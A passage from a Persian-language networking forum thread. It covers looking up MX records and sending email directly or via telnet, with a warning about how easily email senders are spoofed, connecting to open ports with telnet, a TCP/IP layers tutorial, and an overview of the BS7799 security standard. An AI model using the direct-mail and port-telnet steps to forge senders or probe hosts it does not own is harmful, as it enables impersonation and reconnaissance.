nymail1.turner.com cnn.com MX preference = 10, mail exchanger = atlmail1.turner.com cnn.com nameserver = twdns-04.ns.aol.com cnn.com nameserver = twdns-01.ns.aol.com cnn.com nameserver = twdns-02.ns.aol.com cnn.com nameserver = twdns-03.ns.aol.com atlmail1.turner.com internet address = 64.236.240.146 atlmail4.turner.com internet address = 64.236.221.5 atlmail2.turner.com internet address = 64.236.240.147 nymail1.turner.com internet address = 64.236.180.95 اگر کمي دقت کنيد، قسمت MX preference همواره داراي يک عدد است. اگر جوابهاي متفاوتي پيدا شد، جوابي که عدد MX preference آن کمتر باشد به طور معمول انتخاب مناسبتري است و بايد اولين جوابي باشد که امتحان مي کنيد. با اين روش شما مي توانيد بدون استفاده از SMTP خاصي ايميلهاي خود را ارسال کنيد يا برنامه اي بنويسيد که ايميل ارسال کند. سوالي که در اينجا پيش مي آيد اين است که چه کارهايي در اين زمينه مجاز و چه کارهايي غيرقانوني است. فرستادن ايميل به هزاران نفر طوري که به هر کدام فقط يک ايميل برسد و آنها راهي براي خروج از ليست شما داشته باشند غيرقانوني نيست اما ممکن است ISP يا Host شما را عصباني کند، بنابراين بهتر است از آنها سوال کنيد يا حداقل مطمئن باشيد که در قراردادي که با آنها امضا کرده ايد ممنوعيت اين مورد ذکر نشده باشد. البته اگر اين ايميل طوري فرستاده شود که فرستنده آن صحيح نباشد و به نظر برسد که از طرف کس ديگري آمده است قابل پيگرد قانوني است و افراد زيادي در دنيا به اين دليل محاکمه شده اند. فرستادن چندين ايميل به يک فرد طوري که سبب مزاحمت وي يا از دست رفتن برخي از اطلاعات وي شود جرو است و از طريق مراجع ذيصلاح قابل پيگرد قانوني مي باشد. فرستادن ايميل طوري که به نظر برسد از آدرسي ديگر آمده است، اگر آن آدرس ديگر متعلق به شما نباشد علاوه بر غير اخلاقي بودن عمل، انشاءالله قابل پيگيري قانوني مي باشد. از توضيح نصب و کار با SMTP روي ويندوز شخصي منصرف شديم، اما همين قدر بدانيد که از control panel-> add/remove programs بايأ به قسمت add/remove windows components برويد و از آنجا IIS و Message queuing را نصب کنيد و سپس در صورت نياز آنها را تنظيم کنيد. به اين شکل شما قادر به فرستادن ايميل با telnet کردن به آدرس localhost يا آدرس IP 127.0.0.1 به هر آدرسي خواهيد بود. اميدوارم بعد از خواندن اين صفحات به اين نتيجه رسيده باشيد که هرکسي به راحتي مي تواند هر ايميلي را از طرف کس ديگري براي شما ارسال کند و در مورد ايميلهاي مشکوک بايد احتياط کنيد. البته مشکلات ايميل به اينجا ختم نمي شود... ايميل را به طور معمول به کارت پستال بدون پاکت تشبيه مي کنند به اين مفهوم که در مسير رايانه شما به رايانه گيرنده نامه در تمام مسيرهاي مياني و توسط پستچيها قابل خواندن است! اگرچه متاسفانه در ايران به دليل اهميت ندادن به امنيت اطلاعات، تمامي مکالمات تلفني (بخصوص تلفن همراه)، فکس و مانند آنها هم همين حکم را دارند و در مقايسه وضع ايميل کمي بهتر است (بعد بگيد چرا تجارت الکترونيکي نداريم... يا بگيد چرا بانکها خودشون برا خودشون شبکه راه مي اندازند يا...)! سوال :جگونه مي شود به يک پورت باز telnet کرد؟ پاسخ:براي اينکه عملکرد يک پورت براي شما روشن شود، بايد به آن پورت Telnet کنيد.البته معمولا تعدادي از پورتهايي را که ممکن است اطلاعاتي مهم را در اختيار هکرها قرار دهند مثل پورت ۷۹ يا ۸۰ معمولا بسته است و ارتباط با آنها شايد برقرار نشود. براي telnet کردن در command prompt دستور زير را تايپ کنيد: telnet hostname portnum در اين دستور بهجاي hostname شماره ip و يا نام سايت را وارد ميکنيد و بهجاي portnum شماره پورت توجه کنيد که فقط در صورتي ميتوانيد با يک پورت تلنت کنيد که ان پورت open باشد . مثلا براي تلنت کردن به پورت ۱۳ که ساعت و تاريخ را بهدست ميدهد در کامپيوتري با IP : ۱۹۲.۱۶۸.۱۰۰.۳۵ مينويسيد: telnet 192.168.100.35 13 يا اگر ip سايت مورد نظر رو بلد نبوديد (بعد روش بدست اوردن ip رو هم ميگم) ميتوانيد از اين راه استفاده کنيد: telnet yahoo.com 13

secret آنلاین نیست. پاسخ با نقل قول
مفاهيم پروتکل TCP/IP در شبكه

پروتکل TCP/IP TCP/IP ، يکی از مهمترين پروتکل های استفاده شده در شبکه های کامپيوتری است . اينترنت بعنوان بزرگترين شبکه موجود ، از پروتکل فوق بمنظور ارتباط دستگاه های متفاوت استفاده می نمايد. پروتکل ، مجموعه قوانين لازم بمنظور قانونمند نمودن نحوه ارتباطات در شبکه های کامپيوتری است .در مجموعه مقالاتی که ارائه خواهد شد به بررسی اين پروتکل خواهيم پرداخت . در اين بخش مواردی همچون : فرآيند انتقال اطلاعات ، معرفی و تشريح لايه های پروتکل TCP/IP و نحوه استفاده از سوکت برای ايجاد تمايز در ارتباطات ، تشريح می گردد. مقدمه امروزه اکثر شبکه های کامپيوتری بزرگ و اغلب سيستم های عامل موجود از پروتکل TCP/IP ، استفاده و حمايت می نمايند. TCP/IP ، امکانات لازم بمنظور ارتباط سيستم های غيرمشابه را فراهم می آورد. از ويژگی های مهم پروتکل فوق ، می توان به مواردی همچون : قابليت اجراء بر روی محيط های متفاوت ، ضريب اطمينان بالا ،قابليت گسترش و توسعه آن ، اشاره کرد . از پروتکل فوق، بمنظور دستيابی به اينترنت و استفاده از سرويس های متنوع آن نظير وب و يا پست الکترونيکی استفاده می گردد. تنوع پروتکل های موجود در پشته TCP/IP و ارتباط منطقی و سيستماتيک آنها با يکديگر، امکان تحقق ارتباط در شبکه های کامپيوتری را با اهداف متفاوت ، فراهم می نمايد. فرآيند برقراری يک ارتباط ، شامل فعاليت های متعددی نظير : تبديل نام کامپيوتر به آدرس IP معادل ، مشخص نمودن موقعيت کامپيوتر مقصد ، بسته بندی اطلاعات ، آدرس دهی و روتينگ داده ها بمنظور ارسال موفقيت آميز به مقصد مورد نظر ، بوده که توسط مجموعه پروتکل های موجود در پشته TCP/IP انجام می گيرد. معرفی پروتکل TCP/IP TCP/IP ، پروتکلی استاندارد برای ارتباط کامپيوترهای موجود در يک شبکه مبتنی بر ويندوز 2000 است. از پروتکل فوق، بمنظور ارتباط در شبکه های بزرگ استفاده می گردد. برقراری ارتباط از طريق پروتکل های متعددی که در چهارلايه مجزا سازماندهی شده اند ، ميسر می گردد. هر يک از پروتکل های موجود در پشته TCP/IP ، دارای وظيفه ای خاص در اين زمينه ( برقراری ارتباط) می باشند . در زمان ايجاد يک ارتباط ، ممکن است در يک لحظه تعداد زيادی از برنامه ها ، با يکديگر ارتباط برقرار نمايند. TCP/IP ، دارای قابليت تفکيک و تمايز يک برنامه موجود بر روی يک کامپيوتر با ساير برنامه ها بوده و پس از دريافت داده ها از يک برنامه ، آنها را برای برنامه متناظر موجود بر روی کامپيوتر ديگر ارسال می نمايد. نحوه ارسال داده توسط پروتکل TCP/IP از محلی به محل ديگر ، با فرآيند ارسال يک نامه از شهری به شهر، قابل مقايسه است . برقراری ارتباط مبتنی بر TCP/IP ، با فعال شدن يک برنامه بر روی کامپيوتر مبدا آغاز می گردد . برنامه فوق ،داده های مورد نظر جهت ارسال را بگونه ای آماده و فرمت می نمايد که برای کامپيوتر مقصد قابل خواندن و استفاده باشند. ( مشابه نوشتن نامه با زبانی که دريافت کننده ، قادر به مطالعه آن باشد) . در ادامه آدرس کامپيوتر مقصد ، به داده های مربوطه اضافه می گردد ( مشابه آدرس گيرنده که بر روی يک نامه مشخص می گردد) . پس از انجام عمليات فوق ، داده بهمراه اطلاعات اضافی ( درخواستی برای تائيد دريافت در مقصد ) ، در طول شبکه بحرکت درآمده تا به مقصد مورد نظر برسد. عمليات فوق ، ارتباطی به محيط انتقال شبکه بمنظور انتقال اطلاعات نداشته ، و تحقق عمليات فوق با رويکردی مستقل نسبت به محيط انتقال ، انجام خواهد شد . لايه های پروتکل TCP/IP TCP/IP ، فرآيندهای لازم بمنظور برقراری ارتباط را سازماندهی و در اين راستا از پروتکل های متعددی در پشته TCP/IP استفاده می گردد. بمنظور افزايش کارآئی در تحقق فرآيند های مورد نظر، پروتکل ها در لايه های متفاوتی، سازماندهی شده اند . اطلاعات مربوط به آدرس دهی در انتها قرار گرفته و بدين ترتيب کامپيوترهای موجود در شبکه قادر به بررسی آن با سرعت مطلوب خواهند بود. در اين راستا، صرفا" کامپيوتری که بعنوان کامپيوتر مقصد معرفی شده است ، امکان باز نمودن بسته اطلاعاتی و انجام پردازش های لازم بر روی آن را دارا خواهد بود. TCP/IP ، از يک مدل ارتباطی چهار لايه بمنظور ارسال اطلاعات از محلی به محل ديگر استفاده می نمايد: Application ,Transport ,Internet و Network Interface ، لايه های موجود در پروتکل TCP/IP می باشند.هر يک از پروتکل های وابسته به پشته TCP/IP ، با توجه به رسالت خود ، در يکی از لايه های فوق، قرار می گيرند. لايه Application لايه Application ، بالاترين لايه در پشته TCP/IP است .تمامی برنامه و ابزارهای کاربردی در اين لايه ، با استفاده از لايه فوق، قادر به دستتيابی به شبکه خواهند بود. پروتکل های موجود در اين لايه بمنظور فرمت دهی و مبادله اطلاعات کاربران استفاده می گردند . HTTP و FTP دو نمونه از پروتکل ها ی موجود در اين لايه می باشند . پروتکل HTTP)Hypertext Transfer Protocol) . از پروتکل فوق ، بمنظور ارسال فايل های صفحات وب مربوط به وب ، استفاده می گردد . پروتکل FTP)File Transfer Protocol) . از پروتکل فوق برای ارسال و دريافت فايل، استفاده می گردد . لايه Transport لايه " حمل " ، قابليت ايجاد نظم و ترتيب و تضمين ارتباط بين کامپيوترها و ارسال داده به لايه Application ( لايه بالای خود) و يا لايه اينترنت ( لايه پايين خود) را بر عهده دارد. لايه فوق ، همچنين مشخصه منحصربفردی از برنامه ای که داده را عرضه نموده است ، مشخص می نمايد. اين لايه دارای دو پروتکل اساسی است که نحوه توزيع داده را کنترل می نمايند. TCP)Transmission Control Protocol) . پروتکل فوق ، مسئول تضمين صحت توزيع اطلاعات است . UDP)User Datagram Protocol) . پروتکل فوق ، امکان عرضه سريع اطلاعات بدون پذيرفتن مسئوليتی در رابطه با تضمين صحت توزيع اطلاعات را برعهده دارد . لايه اينترنت لايه "اينترنت"، مسئول آدرس دهی ، بسته بندی و روتينگ داده ها ، است. لايه فوق ، شامل چهار پروتکل اساسی است : IP)Internet Protocol) . پروتکل فوق ، مسئول آدرسی داده ها بمنظور ارسال به مقصد مورد نظر است . ARP)Address Resoulation Protocol) . پروتکل فوق ، مسئول مشخص نمودن آدرس MAC)Media Access Control) آداپتور شبکه بر روی کامپيوتر مقصد است. ICMP)Internet Control Message Protocol) . پروتکل فوق ، مسئول ارائه توابع عيب يابی و گزارش خطاء در صورت عدم توزيع صحيح اطلاعات است . IGMP)Internet Group Managemant Protocol) . پروتکل فوق ، مسئول مديريت Multicasting در TCP/IP را برعهده دارد. لايه Network Interface لايه " اينترفيس شبکه " ، مسئول استقرار داده بر روی محيط انتقال شبکه و دريافت داده از محيط انتقال شبکه است . لايه فوق ، شامل دستگاه های فيزيکی نظير کابل شبکه و آداپتورهای شبکه است . کارت شبکه ( آداپتور) دارای يک عدد دوازده رقمی مبنای شانزده ( نظير : B5-50-04-22-D4-66 ) بوده که آدرس MAC ، ناميده می شود. لايه " اينترفيس شبکه " ، شامل پروتکل های مبتنی بر نرم افزار مشابه لايه های قبل ، نمی باشد. پروتکل های Ethernet و ATM)Asynchronous Transfer Mode) ، نمونه هائی از پروتکل های موجود در اين لايه می باشند . پروتکل های فوق ، نحوه ارسال داده در شبکه را مشخص می نمايند. مشخص نمودن برنامه ها در شبکه های کامپيوتری ، برنامه ها ی متعددی در يک زمان با يکديگر مرتبط می گردند. زمانيکه چندين برنامه بر روی يک کامپيوتر فعال می گردند ، TCP/IP ، می بايست از روشی بمنظور تمايز يک برنامه از برنامه ديگر، استفاده نمايد. بدين منظور ، از يک سوکت ( Socket) بمنظور مشخص نمودن يک برنامه خاص ، استفاده می گردد. آدرس IP برقراری ارتباط در يک شبکه ، مستلزم مشخص شدن آدرس کامپيوترهای مبداء و مقصد است ( شرط اوليه بمنظور برقراری ارتباط بين دو نقطه ، مشخص بودن آدرس نقاط درگير در ارتباط است ) . آدرس هر يک از دستگاه های درگير در فرآيند ارتباط ، توسط يک عدد منحصربفرد که IP ناميده می شود ، مشخص می گردند. آدرس فوق به هريک از کامپيوترهای موجود در شبکه نسبت داده می شود . IP : 10. 10.1.1 ، نمونه ای در اين زمينه است . پورت TCP/UDP پورت مشخصه ای برای يک برنامه و در يک کامپيوتر خاص است .پورت با يکی از پروتکل های لايه "حمل" ( TCP و يا UDP ) مرتبط و پورت TCP و يا پورت UDP ، ناميده می شود. پورت می تواند عددی بين صفر تا 65535 را شامل شود. پورت ها برای برنامه های TCP/IP سمت سرويس دهنده ، بعنوان پورت های "شناخته شده " ناميده شده و به اعداد کمتر از 1024 ختم و رزو می شوند تا هيچگونه تعارض و برخوردی با ساير برنامه ها بوجود نيايد. مثلا" برنامه سرويس دهنده FTP از پورت TCP بيست و يا بيست ويک استفاده می نمايد. سوکت (Socket) سوکت ، ترکيبی از يک آدرس IP و پورت TCP ويا پورت UDP است . يک برنامه ، سوکتی را با مشخص نمودن آدرس IP مربوط به کامپيوتر و نوع سرويس ( TCP برای تضمين توزيع اطلاعات و يا UDP) و پورتی که نشاندهنده برنامه است، مشخص می نمايد. آدرس IP موجود در سوکت ، امکان آدرس دهی کامپيوتر مقصد را فراهم و پورت مربوطه ، برنامه ای را که داده ها برای آن ارسال می گردد را مشخص می نمايد. در بخش دوم اين مقاله به تشريح هر يک از پروتکل های موجود در پشته TCP/IP، خواهيم پرداخت . TCP/IP ،شامل شش پروتکل اساسی( TCP,UDP,IP,ICMP,IGMP ،ARP ) و مجموعه ای از برنامه های کاربردی است. پروتکل های فوق، مجموعه ای از استادنداردها ی لازم بمنظور ارتباط بين کامپيوترها و دستگاهها را در شبکه ، فراهم می نمايد. تمامی برنامه ها و ساير پروتکل ها ی موجود در پروتکل TCP/IP ، به پروتکل های شش گانه فوق مرتبط و از خدمات ارائه شده توسط آنان استفاده می نمايند . در ادامه به تشريح عملکرد و جايگاه هر يک از پروتکل های اشاره شده ، خواهيم پرداخت . پروتکل TCP : لايه Transport TCP) Transmission Control Protocol) ، يکی از پروتکل های استاندارد TCP/IP است که امکان توزيع و عرضه اطلاعات ( سرويس ها) بين صرفا" دو کامپيوتر ، با ضريب اعتماد بالا را فراهم می نمايد. چنين ارتباطی ( صرفا" بين دو نقطه ) ، Unicast ناميده می شود . در ارتباطات با رويکرد اتصال گرا ، می بايست قبل از ارسال داده ، ارتباط بين دو کامپيوتر برقرار گردد . پس از برقراری ارتباط ، امکان ارسال اطلاعات برای صرفا" اتصال ايجاد شده ، فراهم می گردد . ارتباطات از اين نوع ، بسيار مطمئن می باشند ، علت اين امر به تضمين توزيع اطلاعات برای مقصد مورد نظر برمی گردد . بر روی کامپيوتر مبداء ، TCP داده هائی که می بايست ارسال گردند را در بسته های اطلاعاتی (Packet) سازماندهی می نمايد. در کامپيوتر مقصد ، TCP ، بسته های اطلاعاتی را تشخيص و داده های اوليه را مجددا" ايجاد خواهد کرد . ارسال اطلاعات با استفاده از TCP TCP ، بمنظور افزايش کارائی ، بسته های اطلاعاتی را بصورت گروهی ارسال می نمايد . TCP ، يک عدد سريال ( موقعيت يک بسته اطلاعاتی نسبت به تمام بسته اطلاعاتی ارسالی ) را به هريک از بسته ها نسبت داده و از Acknowledgment بمنظور اطمينان از دريافت گروهی از بسته های اطلاعاتی ارسال شده ، استفاده می نمايد. در صورتيکه کامپيوتر مقصد ، در مدت زمان مشخصی نسبت به اعلام وصول بسته های اطلاعاتی ، اقدام ننمايد ، کامپيوتر مبداء ، مجددا" اقدام به ارسال اطلاعات می نمايد. علاوه برافزودن يک دنباله عددی و Acknowledgment به يک بسته اطلاعاتی ، TCP اطلاعات مربوط به پورت مرتبط با برنامه ها ی مبداء و مقصد را نيز به بسته اطلاعاتی اضافه می نمايد. کامپيوتر مبداء ، از پورت کامپيوتر مقصد بمنظور هدايت صحيح بسته های اطلاعاتی به برنامه مناسب بر روی کامپيوتر مقصد ، استفاده می نمايد. کامپيوتر مقصد از پورت کامپيوتر مبداء بمنظور برگرداندن اطلاعات به برنامه ارسال کننده در کامپيوتر مبداء ، استفاده خواهد کرد . هر يک از کامپيوترهائی که تمايل به استفاده از پروتکل TCP بمنظور ارسال اطلاعات دارند ، می بايست قبل از مبادله اطلاعات ، يک اتصال بين خود ايجاد نمايند . اتصال فوق ، از نوع مجازی بوده و Session ناميده می شود .دو کامپيوتر درگير در ارتباط ، با استفاده از TCP و بکمک فرآيندی با نام : Three-Way handshake ، با يکديگر مرتبط و هر يک پايبند به رعايت اصول مشخص شده در الگوريتم مربوطه خواهند بود . فرآيند فوق ، در سه مرحله صورت می پذيرد : مرحله اول : کامپيوتر مبداء ، اتصال مربوطه را از طريق ارسال اطلاعات مربوط به Session ، مقداردهی اوليه می نمايد ( عدد مربوط به موقعيت يک بسته اطلاعاتی بين تمام بسته های اطلاعاتی و اندازه مربوط به بسته اطلاعاتی ) مرحله دوم : کامپيوتر مقصد ، به اطلاعات Session ارسال شده ، پاسخ مناسب را خواهد داد . کامپيوتر مبداء ، از شرح واقعه بکمک Acknowledgment ارسال شده توسط کامپيوتر مقصد ، آگاهی پيدا خواهد کرد . پروتکل UDP : لايه Transport UDP) User Datagram Protocol ) ، پروتکلی در سطح لايه "حمل" بوده که برنامه مقصد در شبکه را مشخص نموده و از نوع بدون اتصال است . پروتکل فوق، امکان توزيع اطلاعات با سرعت مناسب را ارائه ولی در رابطه با تضمين صحت ارسال اطلاعات ، سطح مطلوبی از اطمينان را بوجود نمی آورد . UDP در رابطه با داده های دريافتی توسط مقصد ، به Acknowledgment نيازی نداشته و در صورت بروز اشکال و يا خرابی در داده های ارسال شده ، تلاش مضاعفی بمنظور ارسال مجدد داده ها ، انجام نخواهد شد . اين بدان معنی است که داده هائی کمتر ارسال می گردد ولی هيچيک از داده های دريافتی و صحت تسلسل بسته های اطلاعاتی ، تضمين نمی گردد .از پروتکل فوق ، بمنظور انتقال اطلاعات به چندين کامپيوتر با استفاده از Broadcast و يا Multicast ، استفاده بعمل می آيد . پروتکل UDP ، در موارديکه حجم اندکی از اطلاعات ارسال و يا اطلاعات دارای اهميت بالائی نمی بانشد ، نيز استفاده می گردد. استفاده از پروتکل UDP در مواردی همچون Multicasting Streaming media ، (نظير يک ويدئو کنفرانس زنده) و يا انتشار ليستی از اسامی کامپيوترها که بمنظور ارتباطات محلی استفاده می گردند ، متداول است . بمنظور استفاده از UDP ، برنامه مبداء می بايست پورت UDP خود را مشخص نمايد دقيقا" مشابه عملياتی که می بايست کامپيوتر مقصد انجام دهد . لازم به يادآوری است که پورت های UDP از پورت های TCP مجزا و متمايز می باشند (حتی اگر دارای شماره پورت يکسان باشند ). پروتکل IP : لايه Internet IP) Internet Protocol ) ، امکان مشخص نمودن محل کامپيوتر مقصد در يک شبکه ارتباطی را فراهم می نمايد. IP ، يک پروتکل بدون اتصال و غيرمطمئن بوده که اولين مسئوليت آن آدرس دهی بسته های اطلاعاتی و روتينگ بين کامپيوترهای موجود در شبکه است . با اينکه IP همواره سعی در توزيع يک بسته اطلاعاتی می نمايد ، ممکن است يک بسته اطلاعاتی در زمان ارسال گرفتار مسائل متعددی نظير : گم شدن ، خرابی ، عدم توزيع با اولويت مناسب ، تکرار در ارسال و يا تاخير، گردند.در چنين مواردی ، پروتکل IP تلاشی بمنظور حل مشکلات فوق را انجام نخواهد داد ( ارسال مجدد اطلاعات درخواستی ) .آگاهی از وصول بسته اطلاعاتی در مقصد و بازيافت بسته های اطلاعاتی گم شده ، مسئوليتی است که بر عهده يک لايه بالاتر نظير TCP و يا برنامه ارسال کننده اطلاعات ، واگذار می گردد . عمليات انجام شده توسط IP می توان IP را بعنوان مکانی در نظر گرفت که عمليات مرتب سازی و توزيع بسته های اطلاعاتی در آن محل ، صورت می پذيرد .بسته ها ی اطلاعاتی توسط يکی از پروتکل های لايه حمل ( TCP و يا UDP) و يا از طريق لايه " ايترفيس شبکه " ، برای IP ارسال می گردند . اولين وظيفه IP ، روتينگ بسته های اطلاعاتی بمنظور ارسال به مقصد نهائی است . هر بسته اطلاعاتی ، شامل آدرس IP مبداء ( فرستنده ) و آدرس IP مقصد ( گيرنده ) می باشد. در صورتيکه IP ، آدرس مقصدی را مشخص نمايد که در همان سگمنت موجود باشد ، بسته اطلاعاتی مستقيما" برای کامپيوتر مورد نظر ارسال می گردد . در صورتيکه آدرس مقصد در همان سگمنت نباشد ، IP ، می بايست از يک روتر استفاده و اطلاعات را برای آن ارسال نمايد.يکی ديگر از وظايف IP ، ايجاد اطمينان از عدم وجود يک بسته اطلاعاتی ( بلاتکليف ! ) در شبکه است . بدين منظور محدوديت زمانی خاصی در رابطه با مدت زمان حرکت بسته اطلاعاتی در طول شبکه ، در نظر گرفته می شود .عمليات فوق، توسط نسبت دادن يک مقدار TTL)Time To Live) به هر يک از بسته های اطلاعاتی صورت می پذيرد. TTL ، حداکثر مدت زمانی را که بسته اطلاعاتی قادر به حرکت در طول شبکه است را مشخص می نمايد( قبل از اينکه بسته اطلاعاتی کنار گذاشته شود) . پروتکل ICMP : لايه Internet ICMP) Internet Control Message Protocol) ، امکانات لازم در خصوص اشکال زدائی و گزارش خطاء در رابطه با بسته های اطلاعاتی غيرقابل توزيع را فراهم می نمايد. با استفاده از ICMP ، کامپيوترها و روترها که از IP بمنظور ارتباطات استفاده می نمايند ، قادر به گزارش خطاء و مبادله اطلاعاتی محدود در رابطه وضعيت بوجود آمده می باشند. مثلا" در صورتيکه IP ، قادر به توزيع يک بسته اطلاعاتی به مقصد مورد نظر نباشد ، ICMP يک پيام مبتنی بر غيرقابل دسترس بودن را برای کامپيوتر مبداء ارسال می دارد . با اينکه پروتکل IP بمنظور انتقال داده بين روترهای متعدد استفاده می گردد ، ولی ICMP به نمايندگی از TCP/IP ، مسئول ارائه گزارش خطاء و يا پيام های کنترلی است . تلاش ICMP ، در اين جهت نيست که پروتکل IP را بعنوان يک پروتکل مطمئن مطرح نمايد ، چون پيام های ICMP دارای هيچگونه محتوياتی مبنی بر اعلام وصول پيام (Acknowledgment ) بسته اطلاعاتی نمی باشند . ICMP ، صرفا" سعی در گزارش خطاء و ارائه فيدبک های لازم در رابطه با تحقق يک وضعيت خاص را می نمايد . پروتکل IGMP : لايه Internet IGMP) Internet Group Managment Protocol) ، پروتکلی است که مديريت ليست اعضاء برای IP Multicasting ، در يک شبکه TCP/IP را بر عهده دارد . IP Multicasting، فرآيندی است که بر اساس آن يک پيام برای گروهی انتخاب شده از گيرندگان که گروه multicat ناميده می شوند ؛ ارسال می گردد . IGMP ليست اعضاء را نگهداری می نمايد . پروتکل ARP : لايه Internet ARP) Address Resolution Protocol) ، پروتکلی است که مسئوليت مسئله " نام به آدرس" را در رابطه با بسته های اطلاعاتی خروجی (Outgoing) ، برعهده دارد . ماحصل فرآيند فوق ، Mapping آدرس IP به آدرسMAC )Media Access Control) ، مربوطه است . کارت شبکه از آدرس MAC ، بمنظور تشخيص تعلق يک بسته اطلاعاتی به کامپيوتر مربوطه ، استفاده می نمايند . بدون آدرس های MAC ، کارت های شبکه ، دانش لازم در خصوص ارسال بسته های اطلاعاتی به لايه بالاتر بمنظور پردازش های مربوطه را دارا نخواهند بود . همزمان با رسيدن بسته های اطلاعاتی به لايه IP بمنظور ارسال در شبکه ، آدرس های MAC مبداء و مقصد به آن اضافه می گردد . ARP ، از جدولی خاص بمنظور ذخيره سازی آدرس های IP و MAC مربوطه ، استفاده می نمايد. محلی از حافظه که جدول فوق در آنجا ذخيره می گردد ، ARP Cache ناميده می شود. ARP Cache هر کامپيوتر شامل mapping لازم برای کامپيوترها و روترهائی است که صرفا" بر روی يک سگمنت مشابه قرار دارند.

يك قدم به سمت امنيت اطلاعات

به وجود آمدن خطوط پرسرعت اينترنتي و دسترسي آسان تر به اين شاهراه اطلاعاتي توسط خطوط Leased و همچنين ارزان شدن تكنولوژي مبتني بر ارتباط بي سيم ، شركت ها و سازمان ها را به تدريج مجبور به رعايت نكات مربوط به ايمني اطلاعات و نيز نصب انواع FireWall ،IDS و همچنين HoneyPot ساخته است. دراين راستا داشتن سياست امنيتي مؤثر و ايجاد روالهاي درست امري اجتناب ناپذير مي نمايد.
براي داشتن سازماني با برنامه و ايده آل ، هدفمند كردن اين تلاش ها براي رسيدن به حداكثر ايمني امري است كه بايد مدنظر قرار گيرد.

استاندارد BS7799 راهكاري است كه اطلاعات سازمان و شركت را دسته بندي و ارزش گذاري كرده و با ايجاد سياستهاي متناسب با سازمان و همچنين پياده سازي 127 كنترل مختلف، اطلاعات سازمان را ايمن مي سازد. اين اطلاعات نه تنها داده هاي كامپيوتري و اطلاعات سرور ها بلكه كليه موارد حتي نگهبان سازمان يا شركت رادر نظر خواهد گرفت.



آيا امنيت 100% امكانپذير است؟

با پيشرفت علوم كامپيوتري و همچنين بوجود آمدن ابزارهاي جديد Hack و Crack و همچنين وجود صدها مشكل ناخواسته در طراحي نرم افزارهاي مختلف و روالهاي امنيتي سازمان ها ، هميشه خطر حمله و دسترسي افراد غيرمجاز وجود دارد. حتي قوي ترين سايتهاي موجود در دنيا در معرض خطر افراد غيرمجاز و سودجو قرار دارند. ولي آيا چون نمي توان امنيت 100% داشت بايد به نكات امنيتي و ايجاد سياستهاي مختلف امنيتي بي توجه بود؟



فوائد استاندارد BS7799 و لزوم پياده سازي

استاندارد BS7799 قالبي مطمئن براي داشتن يك سيستم مورد اطمينان امنيتي مي باشد. در زير به تعدادي از فوائد پياده سازي اين استاندارد اشاره شده است:



اطمينان از تداوم تجارت و كاهش صدمات توسط ايمن ساختن اطلاعات و كاهش تهديدها

اطمينان از سازگاري با استاندارد امنيت اطلاعات و محافظت از داده ها

قابل اطمينان كردن تصميم گيري ها و محك زدن سيستم مديريت امنيت اطلاعات

ايجاد اطمينان نزد مشتريان و شركاي تجاري

امكان رقابت بهتر با ساير شركت ها

ايجاد مديريت فعال و پويا در پياده سازي امنيت داده ها و اطلاعات

بخاطر مشكلات امنيتي اطلاعات و ايده هاي خود را در خارج سازمان پنهان نسازيد





مراحل ايجاد سيستم مديريت امنيت اطلاعات (ISMS)

ايجاد و تعريف سياست ها:
در اين مرحله ايجاد سياستهاي كلي سازمان مدنظر قراردارد. روالها از درون فعاليت شركت يا سازمان استخراج شده و در قالب سند و سياست امنيتي به شركت ارائه مي شود. مديران كليدي و كارشناسان برنامه ريز نقش كليدي در گردآوري اين سند خواهند داشت.



تعيين محدوده عملياتي :
يك سازمان ممكن است داراي چندين زيرمجموعه و شاخه هاي كاري باشد لذا شروع پياده سازي سيستم امنيت اطلاعات كاري بس دشوار است . براي جلوگيري از پيچيدگي پياده سازي ، تعريف محدوده و Scope صورت مي پذيرد. Scope مي تواند ساختمان مركزي يك سازمان يا بخش اداري و يا حتي سايت كامپيوتري سازمان باشد. بنابراين قدم اول تعيين Scope و الويت براي پياده سازي استاندارد امنيت اطلاعات در Scope خواهد بود. پس از پياده سازي و اجراي كنترل هاي BS7799 و اخذ گواهينامه براي محدوده تعيين شده نوبت به پياده سازي آن در ساير قسمت ها مي رسد كه مرحله به مرحله اجرا خواهند شد.



برآورد دارايي ها و طبقه بندي آنها:
براي اينكه بتوان كنترل هاي مناسب را براي قسمت هاي مختلف سازمان اعمال كرد ابتدا نياز به تعيين دارايي ها مي باشيم. در واقع ابتدا بايد تعيين كرد چه داريم و سپس اقدام به ايمن سازي آن نماييم. در اين مرحله ليست كليه تجهيزات و دارايي هاي سازمان تهيه شده و باتوجه به درجه اهميت آن طبقه بندي خواهند شد.



ارزيابي خطرات:
با داشتن ليست دارايي ها و اهميت آن ها براي سازمان ، نسبت به پيش بيني خطرات اقدام كنيد. پس از تعيين كليه خطرات براي هر دارايي اقدام به تشخيص نقاط ضعف امنيتي و دلايل بوجود آمدن تهديدها نماييد و سپس با داشتن اطلاعات نقاط ضعف را برطرف سازيد و خطرات و تهديدها و نقاط ضعف را مستند نماييد.


مديريت خطرات :
مستندات مربوط به خطرات و تهديد ها و همچنين نقاط ضعف امنيتي شما را قادر به اتخاذ تصميم درست و مؤثر براي مقابله با آنها مي نمايد.



انتخاب كنترل مناسب :
استاندارد BS7799 داراي 10 گروه كنترلي مي باشد كه هرگروه شامل چندين كنترل زيرمجموعه است بنابراين در كل 127 كنترل براي داشتن سيستم مديريت امنيت اطلاعات مدنظر قراردارد. با انجام مراحل بالا شركت يا سازمان شما پتانسيل پياده سازي كنترل هاي مذكور را خواهد داشت.

اين ده گروه كنترلي عبارتند از :

1- سياستهاي امنيتي
2- امنيت سازمان
3- كنترل و طبقه بندي دارايي ها
4- امنيت فردي
5- امنيت فيزيكي
6- مديريت ارتباط ها
7- كنترل دسترسي ها
8- روشها و روالهاي نگهداري و بهبود اطلاعات
9- مديريت تداوم كار سازمان
10- سازگاري با موارد قانوني


تعيين قابليت اجرا:
جمع آوري ليست دارايي ها، تعيين تهديدها ، نقاط ضعف امنيتي و در نهايت ايجاد جدول كنترل ها مارا در به دست آوردن جدولي موسوم به SOA يا Statement Of Applicability ياري مي رساند. اين جدول ليستي نهايي از كليه كنترل هاي مورد نياز براي پياده سازي را ارائه مي دهد. با مطالعه اين جدول و مشخص كردن كنترل هاي قابل اجرا و اعمال آنها ،سازمان يا شركت خودرا براي اخذ استاندارد BS7799 آماده خواهيد ساخت.


نتيجه آنكه براي رسيدن به يك قالب درست امنيتي ناچار به استفاده از روال هاي صحيح كاري و همچنين پياده سازي استاندارد امنيت هستيم و استاندارد BS ISO/IEC 17799:2000 انتخابي درست براي رسيدن به اين منظور مي باشد.

17 ترفند مخفی در about:config مرورگر فایرفاکس

